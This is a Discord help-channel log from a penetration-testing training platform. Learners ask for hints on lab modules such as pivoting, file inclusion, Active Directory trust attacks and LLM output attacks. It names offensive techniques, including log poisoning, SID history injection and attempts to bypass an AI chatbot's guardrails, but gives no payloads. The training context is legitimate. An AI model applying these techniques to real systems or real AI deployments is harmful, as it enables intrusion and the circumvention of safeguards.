#modules

1 messages · Page 466 of 1

cloud urchin
#

the price is based on the tier of the module, they've always been that way

#

the subscription can be cheaper

sage granite
#

I think 5-4 years ago when i had premium sub on the labs, it also generated me about 100 cubes in academy each month, and there was no module that was more expensive than 100 cubes, now lab and academy is separated, and the cube worth is much lower cause new modules are about 500 cubes now?

acoustic owl
#

There used to be Tier III and even Tier IV modules that cost 1000 cubes. Years ago, I studied the OSINT module, which cost 1000 cubes at the time.

#

No, not all new modules cost 500 Cubes. For example, all AI modules are max Tier II and cost max 100 Cubes.

#

However, there were also various new Tier 0 modules. You can study these for free. There are currently 31 Tier 0 modules in the Academy

lusty kelp
#

Which NIC's are recommended for this path? Is there a list or something anywhere??

cloud urchin
#

You use the provided attacker machine which has its own wireless nics to attack the targets

lusty kelp
#

Ah nice. I thought you maybe needed some hardware, similar to the OffSec WiFi course.

heady sapphire
#

I just watched a walkthrough from ippsec on POV machine from cpts preparation track . However I don’t understand why he used the RunasCs.exe instead of the normal built in runas.exe in windows to execute a command as another user . Can somebody enlight me ?

analog snow
#

hello! I'm new to htb and accidentally terminated my pwnbox in the intro module cuz i thought i wouldn't need it for the next exercice (rookie mistake 😭) does this mean I can't do the module till tomorrow?

acoustic owl
#

You can use your own VM at any time to access the machines in the modules. You do not necessarily need the PwnBox.

analog snow
#

ah okay, thanks!

snow relic
#

Can anyone give a nudge on Windows Lateral Movement Skills Assessment "What's the content of the flag located at DC C:\Users\Administrator\Desktop\flag.txt?"

late rune
#

Please help

#

This is the exact challenge:

In VirusTotal, what is the name of the file starting with "Mango" in the Files Referring section? 
cyan coral
#

Hi everyone, could someone help me with the LLM OUTPUT ATTACKS skills assessment? I’ve managed to get an admin key and user:pass but neither works to access the chatbot admin. I’d really appreciate any help you can offer. Thanks in advance!

bright quiver
#

Can anyone give me a hand with the ai red team spam assessment ? I input a successful code but when running the eval I get o output and no flag. Maybe my model is wrong or something. Has anyone completed this that could dm me and give me a hand or double check my code?

heady sapphire
#

I just watched a walkthrough from ippsec on POV machine from cpts preparation track . However I don’t understand why he used the RunasCs.exe instead of the normal built in runas.exe in windows to execute a command as another user . Can somebody enlight me ?

late rune
#

@fathom pendant can you also look at my question?

fathom pendant
#

also iirc the module is above tier 0; so avoid sharing information that you had to dig up

late rune
#

oke, then I have to wait till someone who have done that module

fathom pendant
#

you also didn't state the module/section name

late rune
#

oke, so you mean Incident Handling Process/Skills assignments ??

fathom pendant
#

yeah; that'll help people be able to look it up in their own notes and help you based off that

hidden ledge
#

Hello is it normal that I can copy paste from linux to RDP session but I can't do the opposite ? Even with +clipboard option ? There is a weird behavior when I copy from RDP and paste to obsidian or host terminal it just crash the application. Does anyone experienced this before ?

fathom pendant
late rune
#

oke,

im stuck at the Handling/Skills Assignments where I have to lookup a file which begins with the name "Mango" on virustotal
Can somone give me some hints ??

#

im sure I have the right ip.
I copy paste it from the assignment

fathom pendant
#

are you SURE though

#

(it may not end in .0) 😉

late rune
#

yep, im very sure

fathom pendant
#

(me saying are you sure is saying that you're wrong)

#

the first 3 octets are correct; the last is not

late rune
#

you mean of the address I posted earlier in virustotal

fathom pendant
#

yes

late rune
#

oke, then I have to hope openvpn will work

#

it going on and off in Win11 🙁

#

oke , found it

#

but the grader says failed

fathom pendant
#

?

late rune
#

wierd
I did it again with the same name and now it is green 🙂

late rune
#

Some of them I will do tomorrow and then the first module of security analyst done 🙂

late rune
#

And can I have some hints on this one: incident handeling process . skills assignments

+ 2 In the same file (i.e., logs-wazuh.zip), identify the user who executed the suspicious PowerShell command. The format is domain\user. 
#

I looked several time but I cannot find the user

late rune
#

???

coarse pine
#

you asked for help

late rune
#

yep

#

but you said also im so handsome

#

and i think why say that

fathom pendant
coarse pine
coarse pine
fathom pendant
#

No, you said nothing that contributed to actually helping

coarse pine
#

I made people days

fathom pendant
#

Or you just confused them

coarse pine
#

now please be nice or keep channel on topic

fathom pendant
#

Don't tell me what to do lol

#

And I am being nice.

cloud urchin
#

can confirm ab7v is weird

coarse pine
jaunty niche
#

Advanced XSS and CSRF Exploitation Skills Assessment
I'm unable to do csrf could u plz send csrf payload which used?

verbal phoenix
#

hey, can anyone help with the "Virtual Host and Subdomain Fuzzing" questions part, i think I'm having issue or maybe doing something wrong I'm stuck at the first question in the "Web Fuzzing" module

cyan coral
#

Hi everyone, could someone help me with the LLM OUTPUT ATTACKS skills assessment? I’ve managed to get an admin key and user:pass but neither works to access the chatbot admin. I’d really appreciate any help you can offer.

mental canopy
ocean night
#

Read up a little, it's not very direct, but there is information you can use from earlier in that section

wooden hornet
#

does it have something with SNMP commands?

ocean night
#

Read towards the end of the Shares part of the section

#

What you're trying to do is documented there, and therein is your missing credential

cloud urchin
#

@wooden hornet can you please obfuscate the answers to the questions in your pics

ocean night
#

It's tier zero I think?

cloud urchin
#

it is, but it had answers to the challenge

latent niche
fathom pendant
#

find won't help you with total packages installed

latent niche
#

show?

fathom pendant
#

think in terms of Linux: How are packages managed (there are quite a few ways)

latent niche
#

show wasn't installed on the target machine so idk

fathom pendant
#

show isn't it either

latent niche
#

oh uh

#

then idk...

fathom pendant
#

i'm not gonna straight up give you the answer, but I will help you utilize your brain to work your way there

latent niche
#

fair lol

#

well i know i use wc to count it up

#

but then find "packages"

fathom pendant
#

how do you install something on Linux

latent niche
#

like what edxsactlyy is that then

latent niche
#

sudo for root previlidges

fathom pendant
#

that gets you closer; maybe the man page for apt can help you

latent niche
#

hm

fathom pendant
#

reminder what you're searching for is a way to LIST the INSTALLED packages (you may need to make sure you account for an unintended line or two)

latent niche
#

alr 🙏

fathom pendant
#

you can also do a quick search for 'how to list packages with apt'

latent niche
#

i tried apt list --installed

#

i tried using the wc -l to count it up

#

but then uh that wasn't right...

latent niche
fathom pendant
#

The best way to ask questions is to understand what you're actually having trouble with :)
The best way to answer the module questions is to break down what it's asking you to do.
how many total packages are installed on the target system?
This tells us many things about our goal

  • how many; we're looking for a number
  • packages are installed; we're looking for a way to list packages
  • on the target system; we're going to need to connect to the remote system in some form (typically the method is above the question with credentials provided)
fathom pendant
fathom pendant
#

maybe if you use head or tail you can see something from the output that would throw you off by one

latent niche
#

ohyes i see

#

wc -l counts all the lines

#

which the first line wasn't related to the packages

#

so i had to subtract 1

#

ahhh

#

thanksss!

fathom pendant
#

i hope my advice about breaking down the questions is helpful as well. You had some of the puzzle pieces already you just needed the one last bit

latent niche
#

yes it is tyvm

#

the thing is like that wsasn't explained in the lab though...

#

i mean the section

fathom pendant
#

let me pull it up, as I recall the module provided a list of common commands (apt list wasn't there, ik) sometimes you have to dig a little deeper into commands to get the most out of them

ocean night
#

It was mentioned

fathom pendant
#

apt yeah?

latent niche
ocean night
latent niche
#

there was a lot happening lol

ocean night
#

Aye

#

Easily done

latent niche
#

how did i miss that 💀

fathom pendant
#

aptly put in the 'package management' section kek

ocean night
#

As I said, easily done. When trying to take in so much information, it's easy to miss something simple. Don't feel too bad

latent niche
#

ye a previous lab also did something like this

#

where it didn't teach the parameters so i had to look soime up and then when i did the next section it explained it 😭

ocean night
#

Oh..

#

Ok yeah, I get it

latent niche
#

@fathom pendant is your job a real pentester or like a mentor??

fathom pendant
#

remind me what this section's name is @latent niche

fathom pendant
ocean night
#

Question in File Descriptors and Redirections, but knowledge in Package Management

latent niche
fathom pendant
#

LMFAO the only one I DIDN'T click

ocean night
#

That question doesn't feel like it's in the right place..

fathom pendant
#

hmm maybe they were rearranged at somepoint seeing the sec/#

latent niche
fathom pendant
#

get this, by being a moderator for the server

latent niche
#

oh.

#

😭

fathom pendant
#

I earned it by being helpful to the community for a while before the big mods said 'sure make them mod'

latent niche
#

ah i see

#

kk jus curious

fathom pendant
#

no prob, Good luck! I think the only other weirdo/oddball question in that whole module is the one pertaining to using cURL to access https://inlanefreight.com as it requires a bit of knowledge on html and how certain tags may link to other resources (i.e. a href=, source=,etc.)

#

As an aside, if you're using the provided pwnbox I don't believe you'll be able to complete the module if you're on a free account (haven't bought a sub or cubes in the past)

fathom pendant
#

I remember looking up and finding a solution on the (now sunset) forums that broke down the commands and pipes used

ocean night
#

That's public I think Marcie?

#

Ohh nvm

#

I'm dumb

fathom pendant
#

ye

#

limited Internet access on purely free accounts

ocean night
#

But we DID have allow rules for that kinda thing

fathom pendant
#

so i'm blaming some form of oversight issue, either IP change or something that wasn't pushed down the allow list

ocean night
#

Entirely possible, a lot has changed infra wise

#

I'll mention it if so

fathom pendant
#

it is definitely something that's irked a few people in the past (and can probably lead to user retention loss due to the supposed free thing not being doable without a sub or spending money)

ocean night
fathom pendant
#

Rather late than never and wonder why so many people stop using the platform!

ocean night
#

It's not gone behind Cloudflare, so still has its own IP, yeah we'll get that fixed

ocean night
fathom pendant
ocean night
#

Oh, I was still looking at the Getting Started module

#

Thanks, I've raised it.

fathom pendant
#

❤️

thorny onyx
fathom pendant
burnt kelp
#

hi, can I ask for some help on this https://academy.hackthebox.com/module/23/section/513 (CPTS path), I identified place to read /etc/passwd but can not doing the log poisoning to RCE, I do inject payload and verified it got in the log but when execute got nothing, have double-check everything even reset and doing it again

btw, I solve it, nice challenge nice

lilac dust
#

Hi
I am stuck at Attacking Thick Client Applications in Attacking Common Applications
Can anyone help me out?

#

Please DM me if you can

sacred ermine
#

hello guys, anyone can help with
module DACL Attacks II,
skills assessment
q3: Compromise DC04 and read the flag located at C:\Users\Administrator\Desktop\flag.txt ?

I have got the t** hash, and probably even found the vector, but its not working out, need a little help please

alpine drum
#

Hi. I'm new to asking questions on Discord. If I am stuck on completing a Hack The Box Academy module, do I ask the question here ?

waxen totem
alpine drum
#

Obviously, I don't want to give the game away. Perhaps you can help me. I'm trying to complete the DNS section in footprinting but for the life of me I can't get question 4. Everytime I try to answer the question, the spawned machine times out (whatever I am doing, takes over 90 minutes to complete). Am I doing something wrong ?

alpine drum
waxen totem
alpine drum
waxen totem
alpine drum
civic inlet
sacred ermine
sacred ermine
waxen totem
alpine drum
foggy mist
#

Anyone stuck at the final skills assessment of the “LLM Output Attacks” module? Is there something non-obvious that needs to be triggered server-side? I’ve tried all typical output injection and enumeration – no luck so far.

alpine drum
zinc pumice
#

Hi,
I completed the "Attacking Thick Client Applications" section in "Attacking Common Applications," but I have two questions:

-> Why did we focus specifically on the memory size 0000000000003000?

-> How do we know that we need to focus on that particular area?

Could someone clarify these points for me?

prime mirage
#

second order confusion:

#

I have done the module exercise and accessed the second order IDOR page but WHAT I AM I SUPPOSED TO INTRODUCE IN THE ANSWER INPUT???

#

there is no flag

waxen totem
alpine drum
sacred ermine
alpine drum
signal chasm
#

i am doing the module package management (/linux fundamentals) and am trying to install git. however, i looks like https is not really working. i am using th parrot OS VM directly from hackthebox. I can ping google and github, but cannot open it with the firefox browser. how can i fix this https issue? can anybody help me

bright quiver
#

Can anyone help me with the ai red teamer spam assessment? I uploaded but my results come back null or 0 - maybe my model is wrong but not sure. 🤔 or does anyone want to work together through the path. Let me know or dm me.

signal chasm
fathom pendant
#

there are some solutions floating out there, I suggest looking for one that explains what it's doing

signal chasm
#

I am doing the module filter contents, from Linux fundamentals. So, there is a question that is driving me a bit crazy by now. I think I am not understanding the question. the question is: "How many services are listening on the target system on all interfaces? (Not on localhost and IPv4 only)". I already tried couple of things here. ss -tulnp, systemctl list-unit-files --type=service and I already counted them by hand and with grep -c. I still do not get the correct answer. Can anyone help me here?

fathom pendant
heady sapphire
#

Guys I am currently doing the CPTS preparation track machines . And I can make a lot of progress but I almost never can never compromise the machine in my own without a write up . That’s because the machine requires some exploitation steps that Cpts track did not cover or mention at all . An example that I see a lot is the certificate attacks

#

Is it normal that I struggle ? Or I am doing something wrong ?

fathom pendant
#

this is normal

#

CPTS path doesn't go over ESC/Cert Attacks

hasty mauve
fathom pendant
#

aside from ESC-8 i wanna say in password attacks

fathom pendant
#

i.e. 90% relevant 10% not

#

fairly clear as to why they can't have machines that are 100% in-scope/path

heady sapphire
#

So in the exam I must not expect things that are not taught in the cpts course material right (e.g. advanced certificate attacks )?

hasty mauve
fathom pendant
hasty mauve
earnest pasture
fathom pendant
#

The strongest thing you should worry about when doing prep is your methodology

heady sapphire
#

Is there any tool in Linux that can enumerate and restore deleted objects in AD?

heady sapphire
#

Can you give me the command ? I searched BloodyAD but I want able to find such command

earnest pasture
heady sapphire
#

Omg thanks I will try them

earnest pasture
heady sapphire
earnest pasture
fiery palm
#

i have a problem in the module hacking wordpress in the question: Use a vulnerable plugin to download a file containing a flag value via an unauthenticated file download. i tried every commands but im lost to resolve it, anyone else could help me? thank you very much

fathom pendant
heady sapphire
#

When a user is able to recover a deleted user / object in AD environment ? What kind or privilege / rights are required ?

cloud urchin
#

I don't recall having to do that on any module so far

heady sapphire
#

It’s not a section , it is about a machine I just solved

cloud urchin
#

oh #boxes would probably be better then

fiery palm
#

i found it

tender nimbus
#

Hey Guys I’m a Little confused, where its says $# -eq 0 do they mean the amount of arguments given to the script? Bcs $0 is the script it self does that count as an argument?

fathom pendant
tender nimbus
fathom pendant
#

see the second half of what I stated; it never counts itself

tender nimbus
#

Ow read to fast ^^

stuck steeple
#

Are the module specific threads/channels for HTB Academy?
Is there a VPN package for Getting Started - Basic Tools - Banner grabbing?

stuck steeple
fathom pendant
lilac dust
#

Hi
I am stuck at Attacking Thick Client Applications in Attacking Common Applications
Can anyone help me out?

plucky temple
#

Question, if you complete a whole "Job Role Path" do you get some soort of a certificate of that you completed it? I'm thinking of doing the "AI Red Teamer"

#

just out of curiosity

cloud urchin
#

no, but you can download a student transcript that shows all the modules/paths you completed

plucky temple
#

thanks that's great!

strong turtle
#

Is there a way to bookmark individual sections? I know you can favorite whole modules but it would be really nice to keep track of certain sections

cloud urchin
#

Probably with your browser's bookmarks

latent niche
#

How many services are listening on the target system on all interfaces? (Not on localhost and IPv4 only)

#

i need help with this question

#

i tried running netstat -l and its not 100% correct

ocean night
#

Check the Getting Help section to see how you can find out more information about a command

latent niche
ocean night
#

Sometimes you need to do a little research 🙂

latent niche
latent niche
#

so the question is asking to find the LISTENGING services, ALL interfaces, how many, and once again all

#

so it tried netstat -l -i -a which shopuld cover all interfaces that are listening but doesn't work...

#

still getting wrong number

#

i also did wc -l and removed lines not showing the running services

mint lodge
#

Hey all,
I'm at the Password Attacks Module, Pass the Certificate. When I attempt to do Pass the Certificate with the printer bug, I get this error from impacket-ntlmrelayx:

File "/usr/lib/python3.13/threading.py", line 1043, in _bootstrap_inner
    self.run()
    ~~~~~~~~^^
  File "/usr/lib/python3/dist-packages/impacket/examples/ntlmrelayx/attacks/httpattack.py", line 42, in run
    ADCSAttack._run(self)
    ~~~~~~~~~~~~~~~^^^^^^
  File "/usr/lib/python3/dist-packages/impacket/examples/ntlmrelayx/attacks/httpattacks/adcsattack.py", line 81, in _run
    certificate_store = self.generate_pfx(key, certificate)
  File "/usr/lib/python3/dist-packages/impacket/examples/ntlmrelayx/attacks/httpattacks/adcsattack.py", line 113, in generate_pfx
    p12 = crypto.PKCS12()
          ^^^^^^^^^^^^^
  File "/usr/lib/python3/dist-packages/cryptography/utils.py", line 68, in __getattr__
    obj = getattr(self._module, attr)
AttributeError: module 'OpenSSL.crypto' has no attribute 'PKCS12'

Any Idea what can I do to fix this?

cloud urchin
mint lodge
#

Thanks

mint lodge
cloud urchin
#

not sure, can probably make a venv or something

#

or make a snapshot and try it out, then you can always revert

mint lodge
#

Alright. Thanks.

lilac dust
#

Hi
I am stuck at Attacking Thick Client Applications in Attacking Common Applications
Can anyone help me out?

latent niche
#

can someone explain how this is the answer and how come i can't come up with this solution 💀

#

bro the lab did not say how to do this 😭

formal lichen
#

i was stuck on the same thing except i didnt even get to go to the website

wooden hornet
#

can someone tell how to answer this qustion?

i've listed SMB shares but i couldn't connect bob's user i've been stuck on this question for almost two days

cloud urchin
#

Always best to mention the module and section along with the question you're on

wooden hornet
cloud urchin
wooden hornet
cloud urchin
wooden hornet
#

i wrote it and couldn't enter the user

wooden hornet
cloud urchin
#

capitalization matters

#

that's the password

wooden hornet
#

i'll try it even tho i'm sure i wrote it with capitalization

cloud urchin
#

well that's the passwd

wooden hornet
#

i dont know if im missing something but this is what happens when i try to enter the user

cloud urchin
#

works for me

#

are you including the : or something?

#

numlock and hitting your numkeys?

wooden hornet
#

i even tried copyingthe password then pasting it

cloud urchin
#

Try restarting the target

#

it should work

wooden hornet
#

i just started it

digital quarry
#

Gamers I need to ask a dumb question about a skill assessment. Lmk if I can DM you

boreal basin
#

Based on the last result, find out which operating system it belongs to. Submit the name of the operating system as result. please help

digital quarry
boreal basin
#

Host Discovery nmap

little temple
#

You can always use "--help"

normal plover
#

You could've just googled this, "nmap Os detection"

fathom pendant
fathom pendant
#

you may need to do some research

stable aurora
#

hello

#

does anyone know why I hear some random beeping after some time on VMWare

cloud urchin
#

only when some dialog box has opened and i have to click ok or something

verbal panther
#

Hi, I need help with this: According to a wikipedia.com snapshot taken on February 9, 2003, how many articles were they already working on in the English version? Answer with the number they state without any commas, e.g., 100000, not 100,000.

I can't access the Wayback Machine and I don't know how to answer that question; I got the previous answers from other sources.

normal plover
fathom pendant
fallen finch
#

Hello in Introduction to Bash Scripting [Conditional Execution]

How do you answer the Question, i tried both 800980 and 800981 and i'm still getting incorrect answer

fathom pendant
#

both of those numbers are wrong

#

insert your conditional after the var= portion

fallen finch
#

it's still giving me 800981

fathom pendant
#

module is above tier 0 so please refrain from sharing your solution

fallen finch
#

okay sorry can i dm you?

fathom pendant
#

lemme spin up the pwnbox and do it rq but sure

left needle
#

can anyone help me with this error in section dynamic port forwarding with SSH module Pivoting & Tunneling.
Came across this error when trying to use proxychains with msfconsole using rdp_scanner

reef osprey
#

That was helpful, thank you. I struggled a bit, but it can be solved. The issue is how the call to strcmp is resolved on emulators.
On arm libangler.so is mapped normally so Process.getModuleByName("libangler.so") works well. But on x86_64 the call to strcmp is resolved through the dynamic linker libangler.so > PLT >GOT > libc.so, so the actual execution happens inside libc.so, not inside libangler.so.
searching the offset with ghidra as shown in the module will not work. i solved it by hook strcmp directly in libc.so

#

if someone needs the script just dm me

half geyser
#

Trying to do a few modules before my company cans the product, busy with Pass the Certificate. Never used the pwnbox much, but is it supposed to work or do we need to install additional software on it?

jovial tusk
#

Hey team - working through the Attacking Web Applications with FFUF -> Filtering Results exercises and getting a constant answer rejection. Only two options come up (blurred to prevent spoilers) and neither works. I hit the "Show the Solution" eject button and my commands are correct and even the answer shown in there is being rejected. I reset the IP and used the PwnBox instead of my own machine just to see if that was the issue but the error persists.

Am I doing something wrong?

open violet
#

Hello! Has anyone completed AI Defense module from AI Red Teamer path? I have the skills assessment left and I am stuck with the prompt

fathom pendant
jovial tusk
fathom pendant
#

also not the full name, just the subdomain names

#

so not a.academy.htb b.academy.htb just a b

jovial tusk
fathom pendant
#

ah it's been a minute, mb

raven spruce
#

Attacking Common Services - Attacking DNS

Looks like there is something wrong with this lab.

cat ./resolvers.txt
10.129.155.25 <<-- that is the target ip per lab

./subbrute.py inlanefreight.com -s ./names.txt -r ./resolvers.txt -p

Warning: Fewer than 16 resolvers per process, consider adding more nameservers to resolvers.txt.
Warning: No nameservers found, trying fallback list.
inlanefreight.com,A,134.209.24.248

Subbrute evidently doesn't see the host in the file, and goes for the system dns.

fathom pendant
#

and it's not resolvers.txt

raven spruce
#

eh... my goodness

#

thank you

urban forum
#

hello, in SOCKS5 Tunneling with Chisel - Pivoting, Tunneling, and Port Forwarding Module
what is the wrong? ensure there arent any spaces, still wrong answer

fathom pendant
urban forum
fathom pendant
#

the flag should be something like Th3...ng! (obviously not pasting the full flag)

#

ah

fathom pendant
#

carefully 😉

urban forum
fathom pendant
#

cough tunnel cough vision gets us all

#

also you don't need to @ me when you replied to my message

#

the reply feature pings/notifies by default

urban forum
open violet
#
  • AI Defense
  • Skills Assessment
  • Struggle getting tokens
  • I have tried a lot of different queries and most I have received is [redacted]. Not being able to bypass guardrails and I keep receiving "InvalidOutputException. Blocked data exfiltration attempt."

Anyone who can give me a hand?

kindred viper
#

Hi all!

#

Some on can help ?
Footprinting DNS ?

#

use recursive search and max big wordlist for dnsenum

#

dnsenum -p 0 -s 0 --enum inlanefreight.htb --dnsserver DNSIP -f /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt --threads 500 -r

#

but domain not found (
What i do wrong ?

brave field
feral thicket
#

Guys who know what the problem. I have index number i just write "ls -i /etc/sudoers" but its still wrong!!! why???

red estuary
#

Hi, I am working on „Advanced SQL Injections“ Skill Assessment. Was anyone able to solve the second question with sqlmap? I wrote a custom Tramper Script to replace Apostroph with $$, but that did Not work. Can anyone help?

river grove
lime cosmos
#

the task : What is the IP address of the eth0 interface under the ServerStatus -> Ipconfig tab in the fatty-client application?
see i find it the ip addr #.#.0.4 (i just hide the answer to fellow the discord server rules )

little temple
#

You are using your vm or pwnbox?

feral thicket
#

I think its correct

#

idk

little temple
#

The command is correct
The error might be in your way
|| Like instead of target you are finding the index number of your sudoers file ||

little temple
#

Connect to the target

little temple
#

Not the one HTB is asking for

#

There must be credentials given right ? @feral thicket

little temple
red estuary
fathom pendant
raven spruce
#

Attacking Common Services - Attacking DNS

Hey guys, anybody completed this lab recently?

As I don't see any educative value in wasting time waiting if a chosen
bforce dictionary is correct or no, I'm asking here.

Is the "names.txt" wordlist from example below enough? Or do I have to look somewhere else?

./subbrute.py inlanefreight.htb -s ./names.txt -r ./resolvers.txt -p

storm elk
#

You can dm me

river grove
raven spruce
pseudo rivet
#

Got a question about Network Foundations model, how exactly does Static NAT conserve public IP addresses if it is a one-to-one mapping, where each private IP address corresponds directly to a public IP address? Is it, because home networks use PAT and when there is a need for a server that needs to be facing the Internet then we use Static NAT for that singular server, and the conserving IP addresses part is supposed to be the fact that the other devices still use that one public IP from PAT?

#

Also does Enter not work to submit a question or is it my problem?

prime wasp
#

got a question. on Detection & Analysis Stage (Part 1) it asks me to go to TheHive webpage using 10.129.185.188 using port 9000. im using a virtual machine to connect to the academy using openvpn with the downloaded vpn. But the webpage for TheHive is not accessible, I keep getting webpage saying "Unable to connect"

fathom pendant
prime wasp
#

yes i tried that

#

oh wow, i been using https

#

a simple mistake cost my nearly a 3 weeks of suffering

fathom pendant
prime wasp
#

well thank you, it helped

mild kettle
#

Does anyone have any tips to get the vhost that starts with the prefix "web-" on the Web Fuzzing Module - Virtual Hosts and Subdomain Fuzzing topic? I added the IP to the etc/hosts file, no port, but I don't get any responses when I use gobuster to fuzz for vhosts

waxen totem
mild kettle
#

I do but I still don't get any responses

waxen totem
mild kettle
#

Here's a screenshot

cloud urchin
#

Try using the domain instead of IP

#

or add the --domain parameter

mild kettle
#

where would I add it?

waxen totem
# mild kettle Here's a screenshot

In your command it looks like gobuster is attempting to append-domain where you've provided an ip this creates a problem as what it's essentially doing is checking if: <subdomain>.94.237.63.176 exists, which won't exist so you're not gonna get a response. You need to provide the domain instead of the ip, either through the -u field like I've shown in this message #modules message or through the --domain flag.

cloud urchin
#

w1ldgpt gave you a better answer

waxen totem
wooden hornet
#

can i know what causing the session setup faliure?
i used the credentials for the user bob that given in the shares section

i've been trying to solve this for three days and still stuck

wooden hornet
mild kettle
tranquil axle
#

You should also consider that you know the vhost starts with web-, and I don’t think there are a lot of entries in common.txt starting with web-.

waxen totem
mild kettle
waxen totem
wooden hornet
waxen totem
waxen totem
mild kettle
waxen totem
#

don't worry too much about getting it without it being provided, for now, use what's provided.

mild kettle
waxen totem
wooden hornet
waxen totem
fathom pendant
#

or do what w1ld said

waxen totem
fathom pendant
#

you're trying too many things to pass info through

waxen totem
fathom pendant
# mild kettle

does... does your hosts file have the literal word 'ip' ?

wooden hornet
fathom pendant
#

that'll be your problem if so

mild kettle
waxen totem
# mild kettle
  1. That's too many entries
  2. why do you have the string IP at the start of every line?
  3. the format is: <IP(I swear if you put this in as is I will kick you, use the ACTUAL IP, NO PORT)> <domain(see comment in IP)>
fathom pendant
#

also you never specify the port in the hosts file

fathom pendant
waxen totem
#

No offense but y'all need to comprehend, not just read. ISTG

fathom pendant
#

also going back through modules; apparently they explain DNS a bit better than they did a year or so ago where it was just like a brief mention without too much of the theory behind it

waxen totem
mild kettle
fathom pendant
#

Well to be fair and balanced; the old DNS section of "Information Gathering - Web Edition" left a fair bit to be desired

#

I like the analogy of GPS rather than phone book

waxen totem
fathom pendant
#

ye but they give an explanation of the analogy that makes sense; navigating without a Map or GPS would be a pain in the ass (i.e. visiting websites purely by their IPs and needing to memorize a bunch of IPs)

waxen totem
fathom pendant
#

ye, it's moreso that the coordinates can be pulled back/abstracted to a county/city/country/etc

#

my favorite silly fact is that 0.000N,0.000W is in the middle of the ocean

waxen totem
fathom pendant
#

oh yeah for sure

#

like understanding what the tool is giving you is more important than the tool itself

waxen totem
#

Also part of the reason why I usually do exploits manually before doing them automated

fathom pendant
#

i.e. understanding what dig is giving you is more important than the result itself

#

i.e. what A/AAAA/CNAME/NS/MX/TXT/SOA... Records are

#

or plugging a function into a calculator

waxen totem
#

100% agree, we getting off topic though kek

fathom pendant
#

sure it gets you the answer, but if you don't really get it - you're just relying on a tool

#

the only tool I 100% rely on is in the mirror kek

feral adder
#

I got rickrolled :))

waxen totem
#

fun fact: I found a similar easter egg in the CPTS exam kek

past moth
#

Anyone can change Full name in HTB account?

cloud urchin
#

if you can't do what you want in the settings you'd have to reach out to support to see if they can help

compact patrolBOT
finite current
#

Hello all,
i have been stuck on attacking trust for like 3 days now i can't solve it the question number 2 Gain access to the DC03 (Apexcargo.ad) and submit the contents of the flag located in "C:\Users\Administrator\Desktop\flag.txt" from question 1 i abused acl to get admin on the DC and from DC and DC03 there is forest trust i tried sid history injection but its work can any one done this module help

fathom pendant
#

progress: 6/27 module notes condensed

velvet pawn
#

need a nudge on Wi-Fi Evil Twin Attacks > Wi-Fi Evil Twin Attacks - Skills Assessment

got two out of the 3 questions answred, but the first one got me stuck "What is the password of the Wi-Fi network "PulseGrid-INT"?"

anyone available for dm?

worthy sorrel
#

hy @fathom pendant i am right now in exam but facing a particular issue so can i dm you for that i have mailed HTB but i just want to make sure something if it is my issue or networks issue

worthy sorrel
waxen totem
worthy sorrel
#

Okay it is resolved thanks for the reply

opaque maple
#

Hey, did you find an answer to this?

#

No SQL errors no nothing

#

almost as if It's a blind SQL injection, even though the modules never taught or even mentioned "blind"

charred fable
#

Hi can someone help me answer the question :
What numerical label uniquely identifies a device on a network?
I've tried with IP adress, MAC adress but its wrong ...

uncut yarrow
charred fable
uncut yarrow
#

address has two ds

charred fable
#

oh what a mistake, thank you very much 🙂

uncut yarrow
#

Anytime 👍🏻

violet bolt
#

Currently doing the skill assesment of HTB CDSA under the section "Introduciton to incident handling". But the second question is refering to an IP 198, which is not found when using Virustotal and the IP retreived from TheHive under the comment section... am I missing something?

white knoll
#

anyone has passed the skill assesment File inclusion? i almost finished the CWES learning path .
i also follow the solution but it dosen't work .. i spawned 3 times the istance for retrying

white knoll
#

im trying everything ..but it dosent work also the solution , please someone can help?

south hound
white knoll
#

i have execute all the steps and when im going for remote execution the php dosen't execute my code injection , and i compare with the solution and is the same . Can i show u in DM ?

ocean bolt
#

Hello, can anyone of you help me solve the footprinting module? I am stuck at verifying users on a system by enumerating SMTP further.

#

@white knoll please which module challenge are you solving?

ocean bolt
#

Ok

white knoll
tall scroll
#

I've been working through Guided Lab: Traffic Analysis Workflow. Instructions say to connect to target and start capturing on ENS224. I do this and only get traffic such as 172.x.x.x. When I check the guided analysis resources, the IPs are 10.x.x.x and completely different to what is on the ENS224 interface. Is something explained incorrectly or should this activity be completed with the file from pcap resources? Or am I just doing it wrong?

urban forum
#

Hello
in RDP and SOCKS Tunneling with SocksOverRDP - Pivoting, Tunneling, and Port Forwarding module, its a must o run the powershell as admin?
if yes, what if you have a initial foothold but you didnt escalate your privelege, what you will do ?

fathom pendant
#

not always; it just depends

#

but i don't recall needing to run PS as admin for the SocksOverRDP bit

urban forum
#

and there are another pivot machine, and it still block you due to "harmfull software"

urban forum
fathom pendant
#

Defender being disabled != protection isn't running, sometimes there's some protection running in real-time

#

they are two separate things

urban forum
fathom pendant
#

use the GUI to disable RTP

#

also the module is above tier 0; so careful with sharing commands

urban forum
fathom pendant
#

that includes commands you're using to solve problems/advance

urban forum
fathom pendant
#

ah yeah admin is required for regsvr32

#

but that's a separate issue

#

can't load a dll if it's getting yeeted

urban forum
#

yes , because that you must be admin in machine pivot 1 to pivot into the second machine

#

so the scenario teach you to pivot with admin privs into the second pivot machine?

fathom pendant
#

but privilege escalation is a post-exploit process that you can engage in before pivoting so it's not unheard of to be admin on the first machine you access

fathom pendant
urban forum
rustic geode
#

Hi , i need a hint for the sql injection fundamentals ( Skills Assessment : What is the password hash for the user 'admin'? )

fathom pendant
urban forum
fathom pendant
#

find/use a tool that doesn't require you to mess with defender

fathom pendant
#

pretty much every pivoting tool taught allows you to double pivot (albeit in different ways

#

i use ligolo-ng personally

urban forum
#

yup i heared about it, is it possible to perform double pivoting with ligolo-ng ?

fathom pendant
fathom pendant
#

just have patience. someone that's completed the assessment recently may help you. I completed the old assessment which had a different look from what I recall

lunar wraith
#

?

#

It won’t let me type in the password

brave field
fathom pendant
# lunar wraith ?

yes it is; it's a security feature to not display the password when you don't supply it in the command line.

ocean bolt
#

@brave field hello

#

Please can you help me out

open violet
#
  • AI Defense
  • Skills Assessment
  • Struggle getting tokens
    I have tried a lot of different queries and most I have received is [redacted]. Not being able to bypass guardrails and I keep receiving "InvalidOutputException. Blocked data exfiltration attempt."

Anyone who can give me a hand?

uncut slate
fathom pendant
#

the reading specifies

#

also if you go all the way back to the #1234357888114364508 that that message links to; it was resolved

uncut slate
#

It was DNS.

fathom pendant
#

@finite current don't dm without asking

finite current
gloomy grail
#

Hello, I need help for introduction to deserialization attacks skill assesment 2 RCE.
Can someone dm me please?

finite current
#

